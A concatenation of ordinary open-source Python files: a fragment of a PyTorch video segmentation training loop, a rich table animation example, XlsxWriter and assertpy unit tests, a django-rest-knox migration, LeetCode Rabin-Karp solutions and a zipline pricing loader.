ref_imgs = ref_imgs.cuda(self.gpu, non_blocking=True)
prev_imgs = prev_imgs.cuda(self.gpu, non_blocking=True)
curr_imgs = [
curr_img.cuda(self.gpu, non_blocking=True)
for curr_img in curr_imgs
]
ref_labels = ref_labels.cuda(self.gpu, non_blocking=True)
prev_labels = prev_labels.cuda(self.gpu, non_blocking=True)
curr_labels = [
curr_label.cuda(self.gpu, non_blocking=True)
for curr_label in curr_labels
]
obj_nums = list(obj_nums)
obj_nums = [int(obj_num) for obj_num in obj_nums]
batch_size = ref_imgs.size(0)
all_frames = torch.cat([ref_imgs, prev_imgs] + curr_imgs,
dim=0)
all_labels = torch.cat([ref_labels, prev_labels] + curr_labels,
dim=0)
self.engine.restart_engine(batch_size, True)
optimizer.zero_grad(set_to_none=True)
if self.enable_amp:
with torch.cuda.amp.autocast(enabled=True):
loss, all_pred, all_loss, boards = model(
all_frames,
all_labels,
batch_size,
use_prev_pred=use_prev_pred,
obj_nums=obj_nums,
step=step,
tf_board=tf_board,
enable_prev_frame=self.enable_prev_frame,
use_prev_prob=use_prev_prob)
loss = torch.mean(loss)
self.scaler.scale(loss).backward()
self.scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(),
cfg.TRAIN_CLIP_GRAD_NORM)
self.scaler.step(optimizer)
self.scaler.update()
else:
loss, all_pred, all_loss, boards = model(
all_frames,
all_labels,
ref_imgs.size(0),
use_prev_pred=use_prev_pred,
obj_nums=obj_nums,
step=step,
tf_board=tf_board,
enable_prev_frame=self.enable_prev_frame,
use_prev_prob=use_prev_prob)
loss = torch.mean(loss)
torch.nn.utils.clip_grad_norm_(model.parameters(),
cfg.TRAIN_CLIP_GRAD_NORM)
loss.backward()
optimizer.step()
for idx in range(seq_len):
now_pred = all_pred[idx].detach()
now_label = all_labels[idx * bs:(idx + 1) * bs].detach()
now_loss = torch.mean(all_loss[idx].detach())
now_iou = pytorch_iou(now_pred.unsqueeze(1), now_label,
obj_nums) * 100
dist.all_reduce(now_loss)
dist.all_reduce(now_iou)
now_loss /= self.gpu_num
now_iou /= self.gpu_num
if self.rank == 0:
running_losses[idx].update(now_loss.item())
running_ious[idx].update(now_iou.item())
if self.rank == 0:
self.ema.update(self.ema_params)
avg_obj.update(sum(obj_nums) / float(len(obj_nums)))
curr_time = time.time()
batch_time.update(curr_time - last_time)
last_time = curr_time
if step % cfg.TRAIN_TBLOG_STEP == 0:
all_f = [ref_imgs, prev_imgs] + curr_imgs
self.process_log(ref_imgs, all_f[-2], all_f[-1],
ref_labels, all_pred[-2], now_label,
now_pred, boards, running_losses,
running_ious, now_lr, step)
if step % cfg.TRAIN_LOG_STEP == 0:
strs = 'I:{}, LR:{:.5f}, T:{:.1f}({:.1f})s, Obj:{:.1f}({:.1f})'.format(
step, now_lr, batch_time.val,
batch_time.moving_avg, avg_obj.val,
avg_obj.moving_avg)
batch_time.reset()
avg_obj.reset()
for idx in range(seq_len):
strs += ', {}: L {:.3f}({:.3f}) IoU {:.1f}({:.1f})%'.format(
frame_names[idx], running_losses[idx].val,
running_losses[idx].moving_avg,
running_ious[idx].val,
running_ious[idx].moving_avg)
running_losses[idx].reset()
running_ious[idx].reset()
self.print_log(strs)
step += 1
if step % cfg.TRAIN_SAVE_STEP == 0 and self.rank == 0:
max_mem = torch.cuda.max_memory_allocated(
device=self.gpu) / (1024.**3)
ETA = str(
datetime.timedelta(
seconds=int(batch_time.moving_avg *
(cfg.TRAIN_TOTAL_STEPS - step))))
self.print_log('ETA: {}, Max Mem: {:.2f}G.'.format(
ETA, max_mem))
self.print_log('Save CKPT (Step {}).'.format(step))
save_network(self.model,
optimizer,
step,
cfg.DIR_CKPT,
cfg.TRAIN_MAX_KEEP_CKPT,
scaler=self.scaler)
try:
torch.cuda.empty_cache()
# First save original parameters before replacing with EMA version
self.ema.store(self.ema_params)
# Copy EMA parameters to model
self.ema.copy_to(self.ema_params)
# Save EMA model
save_network(self.model,
optimizer,
step,
self.ema_dir,
cfg.TRAIN_MAX_KEEP_CKPT,
backup_dir='./saved_ema_models',
scaler=self.scaler)
# Restore original parameters to resume training later
self.ema.restore(self.ema_params)
except Exception as inst:
self.print_log(inst)
self.print_log('Error: failed to save EMA model!')
self.print_log('Stop training!')
def print_log(self, string):
if self.rank == 0:
print(string)
def process_log(self, ref_imgs, prev_imgs, curr_imgs, ref_labels,
prev_labels, curr_labels, curr_pred, boards,
running_losses, running_ious, now_lr, step):
cfg = self.cfg
mean = np.array([[[0.485]], [[0.456]], [[0.406]]])
sigma = np.array([[[0.229]], [[0.224]], [[0.225]]])
show_ref_img, show_prev_img, show_curr_img = [
img.cpu().numpy()[0] * sigma + mean
for img in [ref_imgs, prev_imgs, curr_imgs]
]
show_gt, show_prev_gt, show_ref_gt, show_preds_s = [
label.cpu()[0].squeeze(0).numpy()
for label in [curr_labels, prev_labels, ref_labels, curr_pred]
]
show_gtf, show_prev_gtf, show_ref_gtf, show_preds_sf = [
label2colormap(label).transpose((2, 0, 1))
for label in [show_gt, show_prev_gt, show_ref_gt, show_preds_s]
]
if cfg.TRAIN_IMG_LOG or cfg.TRAIN_TBLOG:
show_ref_img = masked_image(show_ref_img, show_ref_gtf,
show_ref_gt)
if cfg.TRAIN_IMG_LOG:
save_image(
show_ref_img,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_ref_img.jpeg' % (step)))
show_prev_img = masked_image(show_prev_img, show_prev_gtf,
show_prev_gt)
if cfg.TRAIN_IMG_LOG:
save_image(
show_prev_img,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_prev_img.jpeg' % (step)))
show_img_pred = masked_image(show_curr_img, show_preds_sf,
show_preds_s)
if cfg.TRAIN_IMG_LOG:
save_image(
show_img_pred,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_prediction.jpeg' % (step)))
show_curr_img = masked_image(show_curr_img, show_gtf, show_gt)
if cfg.TRAIN_IMG_LOG:
save_image(
show_curr_img,
os.path.join(cfg.DIR_IMG_LOG,
'%06d_groundtruth.jpeg' % (step)))
if cfg.TRAIN_TBLOG:
for seq_step, running_loss, running_iou in zip(
range(len(running_losses)), running_losses,
running_ious):
self.tblogger.add_scalar('S{}/Loss'.format(seq_step),
running_loss.avg, step)
self.tblogger.add_scalar('S{}/IoU'.format(seq_step),
running_iou.avg, step)
self.tblogger.add_scalar('LR', now_lr, step)
self.tblogger.add_image('Ref/Image', show_ref_img, step)
self.tblogger.add_image('Ref/GT', show_ref_gtf, step)
self.tblogger.add_image('Prev/Image', show_prev_img, step)
self.tblogger.add_image('Prev/GT', show_prev_gtf, step)
self.tblogger.add_image('Curr/Image_GT', show_curr_img, step)
self.tblogger.add_image('Curr/Image_Pred', show_img_pred, step)
self.tblogger.add_image('Curr/Mask_GT', show_gtf, step)
self.tblogger.add_image('Curr/Mask_Pred', show_preds_sf, step)
for key in boards['image'].keys():
tmp = boards['image'][key]
for seq_step in range(len(tmp)):
self.tblogger.add_image('S{}/'.format(seq_step) + key, tmp[seq_step].detach().cpu().numpy(), step)
for key in boards['scalar'].keys():
tmp = boards['scalar'][key]
for seq_step in range(len(tmp)):
self.tblogger.add_scalar('S{}/'.format(seq_step) + key, tmp[seq_step].detach().cpu().numpy(), step)
self.tblogger.flush()
del (boards)
|
examples/table_movie.py | gefei/rich | 33,622 | 12739724 | <reponame>gefei/rich
"""Same as the table_movie.py but uses Live to update"""
import time
from contextlib import contextmanager
from rich import box
from rich.align import Align
from rich.console import Console
from rich.live import Live
from rich.table import Table
from rich.text import Text
TABLE_DATA = [
[
"May 25, 1977",
"Star Wars Ep. [b]IV[/]: [i]A New Hope",
"$11,000,000",
"$1,554,475",
"$775,398,007",
],
[
"May 21, 1980",
"Star Wars Ep. [b]V[/]: [i]The Empire Strikes Back",
"$23,000,000",
"$4,910,483",
"$547,969,004",
],
[
"May 25, 1983",
"Star Wars Ep. [b]VI[/b]: [i]Return of the Jedi",
"$32,500,000",
"$23,019,618",
"$475,106,177",
],
[
"May 19, 1999",
"Star Wars Ep. [b]I[/b]: [i]The phantom Menace",
"$115,000,000",
"$64,810,870",
"$1,027,044,677",
],
[
"May 16, 2002",
"Star Wars Ep. [b]II[/b]: [i]Attack of the Clones",
"$115,000,000",
"$80,027,814",
"$656,695,615",
],
[
"May 19, 2005",
"Star Wars Ep. [b]III[/b]: [i]Revenge of the Sith",
"$115,500,000",
"$380,270,577",
"$848,998,877",
],
]
console = Console()
BEAT_TIME = 0.04
@contextmanager
def beat(length: int = 1) -> None:
yield
time.sleep(length * BEAT_TIME)
table = Table(show_footer=False)
table_centered = Align.center(table)
console.clear()
with Live(table_centered, console=console, screen=False, refresh_per_second=20):
with beat(10):
table.add_column("Release Date", no_wrap=True)
with beat(10):
table.add_column("Title", Text.from_markup("[b]Total", justify="right"))
with beat(10):
table.add_column("Budget", "[u]$412,000,000", no_wrap=True)
with beat(10):
table.add_column("Opening Weekend", "[u]$577,703,455", no_wrap=True)
with beat(10):
table.add_column("Box Office", "[u]$4,331,212,357", no_wrap=True)
with beat(10):
table.title = "Star Wars Box Office"
with beat(10):
table.title = (
"[not italic]:popcorn:[/] Star Wars Box Office [not italic]:popcorn:[/]"
)
with beat(10):
table.caption = "Made with Rich"
with beat(10):
table.caption = "Made with [b]Rich[/b]"
with beat(10):
table.caption = "Made with [b magenta not dim]Rich[/]"
for row in TABLE_DATA:
with beat(10):
table.add_row(*row)
with beat(10):
table.show_footer = True
table_width = console.measure(table).maximum
with beat(10):
table.columns[2].justify = "right"
with beat(10):
table.columns[3].justify = "right"
with beat(10):
table.columns[4].justify = "right"
with beat(10):
table.columns[2].header_style = "bold red"
with beat(10):
table.columns[3].header_style = "bold green"
with beat(10):
table.columns[4].header_style = "bold blue"
with beat(10):
table.columns[2].style = "red"
with beat(10):
table.columns[3].style = "green"
with beat(10):
table.columns[4].style = "blue"
with beat(10):
table.columns[0].style = "cyan"
table.columns[0].header_style = "bold cyan"
with beat(10):
table.columns[1].style = "magenta"
table.columns[1].header_style = "bold magenta"
with beat(10):
table.columns[2].footer_style = "bright_red"
with beat(10):
table.columns[3].footer_style = "bright_green"
with beat(10):
table.columns[4].footer_style = "bright_blue"
with beat(10):
table.row_styles = ["none", "dim"]
with beat(10):
table.border_style = "bright_yellow"
for box_style in [
box.SQUARE,
box.MINIMAL,
box.SIMPLE,
box.SIMPLE_HEAD,
]:
with beat(10):
table.box = box_style
with beat(10):
table.pad_edge = False
original_width = console.measure(table).maximum
for width in range(original_width, console.width, 2):
with beat(1):
table.width = width
for width in range(console.width, original_width, -2):
with beat(1):
table.width = width
for width in range(original_width, 90, -2):
with beat(1):
table.width = width
for width in range(90, original_width + 1, 2):
with beat(1):
table.width = width
with beat(2):
table.width = None
|
xlsxwriter/test/styles/test_write_colors.py | DeltaEpsilon7787/XlsxWriter | 2,766 | 12739730 | <reponame>DeltaEpsilon7787/XlsxWriter<gh_stars>1000+
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, <NAME>, <EMAIL>
#
import unittest
from io import StringIO
from ...styles import Styles
class TestWriteColors(unittest.TestCase):
"""
Test the Styles _write_colors() method.
"""
def setUp(self):
self.fh = StringIO()
self.styles = Styles()
self.styles._set_filehandle(self.fh)
def test_write_colors1(self):
"""Test the _write_colors() method"""
self.styles.custom_colors = ['FF26DA55']
self.styles._write_colors()
exp = """<colors><mruColors><color rgb="FF26DA55"/></mruColors></colors>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_colors2(self):
"""Test the _write_colors() method"""
self.styles.custom_colors = ['FF26DA55', 'FF792DC8', 'FF646462']
self.styles._write_colors()
exp = """<colors><mruColors><color rgb="FF646462"/><color rgb="FF792DC8"/><color rgb="FF26DA55"/></mruColors></colors>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_colors3(self):
"""Test the _write_colors() method"""
self.styles.custom_colors = ['FF792DC8', 'FF646462', 'FF5EA29C',
'FF583AC6', 'FFE31DAF', 'FFA1A759',
'FF600FF1', 'FF0CF49C', 'FFE3FA06',
'FF913AC6', 'FFB97847', 'FFD97827']
self.styles._write_colors()
exp = """<colors><mruColors><color rgb="FFD97827"/><color rgb="FFB97847"/><color rgb="FF913AC6"/><color rgb="FFE3FA06"/><color rgb="FF0CF49C"/><color rgb="FF600FF1"/><color rgb="FFA1A759"/><color rgb="FFE31DAF"/><color rgb="FF583AC6"/><color rgb="FF5EA29C"/></mruColors></colors>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
knox/migrations/0002_auto_20150916_1425.py | GTpyro/django-rest-knox | 788 | 12739735 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('knox', '0001_initial'),
]
operations = [
migrations.DeleteModel('AuthToken'),
migrations.CreateModel(
name='AuthToken',
fields=[
('digest', models.CharField(max_length=64, serialize=False, primary_key=True)),
('salt', models.CharField(max_length=16, serialize=False, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='auth_token_set', on_delete=models.CASCADE)),
],)
]
|
Algo and DSA/LeetCode-Solutions-master/Python/longest-common-subpath.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 12739749 | # Time: O(m * nlogn)
# Space: O(n)
class Solution(object):
def longestCommonSubpath(self, n, paths):
"""
:type n: int
:type paths: List[List[int]]
:rtype: int
"""
def RabinKarp(arr, x): # double hashing
hashes = tuple([reduce(lambda h,x: (h*p+x)%MOD, (arr[i] for i in xrange(x)), 0) for p in P])
powers = [pow(p, x, MOD) for p in P]
lookup = {hashes}
for i in xrange(x, len(arr)):
hashes = tuple([(hashes[j]*P[j] - arr[i-x]*powers[j] + arr[i])%MOD for j in xrange(len(P))]) # in smaller datasets, tuple from list is much faster than tuple from generator, see https://stackoverflow.com/questions/16940293/why-is-there-no-tuple-comprehension-in-python
lookup.add(hashes)
return lookup
def check(paths, x):
intersect = RabinKarp(paths[0], x)
for i in xrange(1, len(paths)):
intersect = set.intersection(intersect, RabinKarp(paths[i], x))
if not intersect:
return False
return True
MOD, P = 10**9+7, (113, 109) # MOD could be the min prime of 7-digit number (10**6+3), P could be (2, 3)
left, right = 1, min(len(p) for p in paths)
while left <= right:
mid = left + (right-left)//2
if not check(paths, mid):
right = mid-1
else:
left = mid+1
return right
# Time: O(m * nlogn)
# Space: O(n)
class Solution2(object):
def longestCommonSubpath(self, n, paths):
"""
:type n: int
:type paths: List[List[int]]
:rtype: int
"""
def RabinKarp(arr, x):
h = reduce(lambda h,x: (h*P+x)%MOD, (arr[i] for i in xrange(x)), 0)
power = pow(P, x, MOD)
lookup = {h}
for i in xrange(x, len(arr)):
h = (h*P - arr[i-x]*power + arr[i])%MOD
lookup.add(h)
return lookup
def check(paths, x):
intersect = RabinKarp(paths[0], x)
for i in xrange(1, len(paths)):
intersect = set.intersection(intersect, RabinKarp(paths[i], x))
if not intersect:
return False
return True
MOD, P = 10**11+19, max(x for p in paths for x in p)+1 # MOD is the min prime of 12-digit number
left, right = 1, min(len(p) for p in paths)
while left <= right:
mid = left + (right-left)//2
if not check(paths, mid):
right = mid-1
else:
left = mid+1
return right
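if __name__ == "__main__":
    # Added sanity check, not part of the original solutions: for the example
    # below the longest common subpath (e.g. [2, 3] or [3, 4]) has length 2.
    example_paths = [[0, 1, 2, 3, 4], [2, 3, 4], [4, 0, 1, 2, 3]]
    print(Solution().longestCommonSubpath(5, example_paths))   # expected: 2
    print(Solution2().longestCommonSubpath(5, example_paths))  # expected: 2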
|
zipline/pipeline/loaders/equity_pricing_loader.py | nathanwolfe/zipline-minute-bars | 412 | 12739759 | <reponame>nathanwolfe/zipline-minute-bars<filename>zipline/pipeline/loaders/equity_pricing_loader.py<gh_stars>100-1000
# Copyright 2015 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from numpy import (
iinfo,
uint32,
)
from zipline.data.us_equity_pricing import (
BcolzDailyBarReader,
SQLiteAdjustmentReader,
)
from zipline.lib.adjusted_array import AdjustedArray
from zipline.errors import NoFurtherDataError
from zipline.utils.calendars import get_calendar
from .base import PipelineLoader
UINT32_MAX = iinfo(uint32).max
class USEquityPricingLoader(PipelineLoader):
"""
PipelineLoader for US Equity Pricing data
Delegates loading of baselines and adjustments.
"""
def __init__(self, raw_price_loader, adjustments_loader):
self.raw_price_loader = raw_price_loader
self.adjustments_loader = adjustments_loader
cal = self.raw_price_loader.trading_calendar or \
get_calendar("NYSE")
self._all_sessions = cal.all_sessions
@classmethod
def from_files(cls, pricing_path, adjustments_path):
"""
Create a loader from a bcolz equity pricing dir and a SQLite
adjustments path.
Parameters
----------
pricing_path : str
Path to a bcolz directory written by a BcolzDailyBarWriter.
        adjustments_path : str
            Path to an adjustments db written by a SQLiteAdjustmentWriter.
"""
return cls(
BcolzDailyBarReader(pricing_path),
SQLiteAdjustmentReader(adjustments_path)
)
def load_adjusted_array(self, columns, dates, assets, mask):
# load_adjusted_array is called with dates on which the user's algo
# will be shown data, which means we need to return the data that would
# be known at the start of each date. We assume that the latest data
# known on day N is the data from day (N - 1), so we shift all query
# dates back by a day.
start_date, end_date = _shift_dates(
self._all_sessions, dates[0], dates[-1], shift=1,
)
colnames = [c.name for c in columns]
raw_arrays = self.raw_price_loader.load_raw_arrays(
colnames,
start_date,
end_date,
assets,
)
adjustments = self.adjustments_loader.load_adjustments(
colnames,
dates,
assets,
)
out = {}
for c, c_raw, c_adjs in zip(columns, raw_arrays, adjustments):
out[c] = AdjustedArray(
c_raw.astype(c.dtype),
mask,
c_adjs,
c.missing_value,
)
return out
def _shift_dates(dates, start_date, end_date, shift):
try:
start = dates.get_loc(start_date)
except KeyError:
if start_date < dates[0]:
raise NoFurtherDataError(
msg=(
"Pipeline Query requested data starting on {query_start}, "
"but first known date is {calendar_start}"
).format(
query_start=str(start_date),
calendar_start=str(dates[0]),
)
)
else:
raise ValueError("Query start %s not in calendar" % start_date)
# Make sure that shifting doesn't push us out of the calendar.
if start < shift:
raise NoFurtherDataError(
msg=(
"Pipeline Query requested data from {shift}"
" days before {query_start}, but first known date is only "
"{start} days earlier."
).format(shift=shift, query_start=start_date, start=start),
)
try:
end = dates.get_loc(end_date)
except KeyError:
if end_date > dates[-1]:
raise NoFurtherDataError(
msg=(
"Pipeline Query requesting data up to {query_end}, "
"but last known date is {calendar_end}"
).format(
query_end=end_date,
calendar_end=dates[-1],
)
)
else:
raise ValueError("Query end %s not in calendar" % end_date)
return dates[start - shift], dates[end - shift]
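if __name__ == '__main__':
    # Hedged usage sketch (not part of zipline): the bcolz directory and the
    # adjustments db below are assumed to have been written beforehand by a
    # BcolzDailyBarWriter and a SQLiteAdjustmentWriter, respectively.
    import os
    pricing_dir = 'daily_equities.bcolz'   # assumed BcolzDailyBarWriter output
    adjustments_db = 'adjustments.sqlite'  # assumed SQLiteAdjustmentWriter output
    if os.path.exists(pricing_dir) and os.path.exists(adjustments_db):
        loader = USEquityPricingLoader.from_files(pricing_dir, adjustments_db)
        print('created loader:', loader)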
|
tests/test_datetime.py | ActivisionGameScience/assertpy | 246 | 12739777 | # Copyright (c) 2015-2019, Activision Publishing, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
from assertpy import assert_that,fail
d1 = datetime.datetime.today()
def test_is_before():
d2 = datetime.datetime.today()
assert_that(d1).is_before(d2)
def test_is_before_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_before(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be before <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_before_bad_val_type_failure():
try:
assert_that(123).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_before_bad_arg_type_failure():
try:
assert_that(d1).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_after():
d2 = datetime.datetime.today()
assert_that(d2).is_after(d1)
def test_is_after_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_after(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be after <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_after_bad_val_type_failure():
try:
assert_that(123).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_after_bad_arg_type_failure():
try:
assert_that(d1).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds():
assert_that(d1).is_equal_to_ignoring_milliseconds(d1)
def test_is_equal_to_ignoring_milliseconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_milliseconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_milliseconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds():
assert_that(d1).is_equal_to_ignoring_seconds(d1)
def test_is_equal_to_ignoring_seconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_seconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_seconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time():
assert_that(d1).is_equal_to_ignoring_time(d1)
def test_is_equal_to_ignoring_time_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_time(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2}> to be equal to <\d{4}-\d{2}-\d{2}>, but was not.')
def test_is_equal_to_ignoring_time_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_greater_than():
d2 = datetime.datetime.today()
assert_that(d2).is_greater_than(d1)
def test_is_greater_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_greater_than_or_equal_to():
assert_that(d1).is_greater_than_or_equal_to(d1)
def test_is_greater_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than_or_equal_to(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than():
d2 = datetime.datetime.today()
assert_that(d1).is_less_than(d2)
def test_is_less_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_bad_arg_type_failure():
try:
assert_that(d1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than_or_equal_to():
assert_that(d1).is_less_than_or_equal_to(d1)
def test_is_less_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than_or_equal_to(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_between():
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d2).is_between(d1, d3)
def test_is_between_failure():
try:
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_between_bad_arg1_type_failure():
try:
assert_that(d1).is_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_not_between():
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d1).is_not_between(d2, d3)
def test_is_not_between_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d2).is_not_between(d1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was.')
